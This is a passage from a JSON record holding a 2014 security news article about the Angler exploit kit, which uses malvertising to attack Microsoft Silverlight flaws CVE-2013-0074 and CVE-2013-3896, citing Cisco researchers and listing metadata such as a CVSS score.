a time was one of the widely targeted platform by the exploit kits developers.\n\n \n\n\n\"_Exploit kit owners are adding Silverlight to their update releases, and since 23 April we have observed substantial traffic - often from malvertising - being driven to Angler instances partially using Silverlight exploits_,\" said Gundert, the lead threat researcher at Cisco.\n\n \n\n\nThe cyber criminals are infiltrating the Advertising Networks with malvertising to redirect victims to the hundreds of malicious websites hosting the Angler Exploit Kit, where the actual attack comes into play by silently launching Silverlight exploits against the infected system.\n\n[](<https://3.bp.blogspot.com/-dMh-lqkMM54/U3yiBjM5mVI/AAAAAAAAbvk/XBrCwCDr1Ts/s1600/Ad-Exchange-flow.png>)\n\nTill now, The [Exploit Kit](<https://thehackernews.com/search/label/exploit%20kit>) (EK) developers were targeting the [vulnerabilities](<https://thehackernews.com/search/label/Vulnerability>) in Adobe Flash and Oracle Java, but as the public awareness and pathing efforts of both the two firms has increased, the malware developers have switched to the Microsoft\u2019s Silverlight.\n\n \n\n\n\u201c_Java and Flash have been heavily exploited over the years, and vendors are getting good at writing engines that detect vulnerabilities in those libraries_,\u201d said the Cisco researcher Craig Williams. \u201c_Silverlight has not been exploited much. There are some limited CVEs, but few are widespread. What we may be seeing here is a tipping point where Java exploits are being detected and what other formats can hackers take advantage of_.\u201d\n\n[](<https://1.bp.blogspot.com/-KuJsqyynLnI/U3yiIwSapdI/AAAAAAAAbvs/hajh-Ij4eNw/s1600/Angler-Attack-flow.png>)\n\nLevi Gundert , Technical lead at Cisco Threat Research observed that the Angler campaign exploits two known Silverlight vulnerabilities i.e. \n\n * CVE-2013-0074 - which gives attackers the ability to remotely execute malicious code\n * CVE-2013-3896 - it allows to bypass Data Execution Prevention (DEP), a security mitigation added to most Microsoft applications.\n\n> \"_We should expect these existing Silverlight exploits to proliferate through other exploit pack families in the near future as threat actors copy code from each other and release updates_,\" Gundert wrote.\n\n> \"_Silverlight exploits are also ideal because Silverlight continues to gain rich Internet application market share, perhaps surpassing Java, and Microsoft\u2019s life cycle schedule suggests Silverlight 5 will be supported through October, 2021_.\"\n\nThe security firm didn't expose the names of compromised websites serving the exploit kit. The Angler exploit kit managers were expected to be of the same group that was behind the infamous [Reveton ransomware](<https://thehackernews.com/2013/02/group-behind-largest-ransomware.html>).\n", "modified": "2014-05-21T12:59:24", "published": "2014-05-21T01:59:00", "id": "THN:BC65D2F30C85103414F6BD1EC204BB05", "href": "https://thehackernews.com/2014/05/netflix-users-targeted-by-microsoft.html", "type": "thn", "title": "Netflix Users Targeted by Microsoft Silverlight Exploits", "cvss": {"score": 9.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}]}
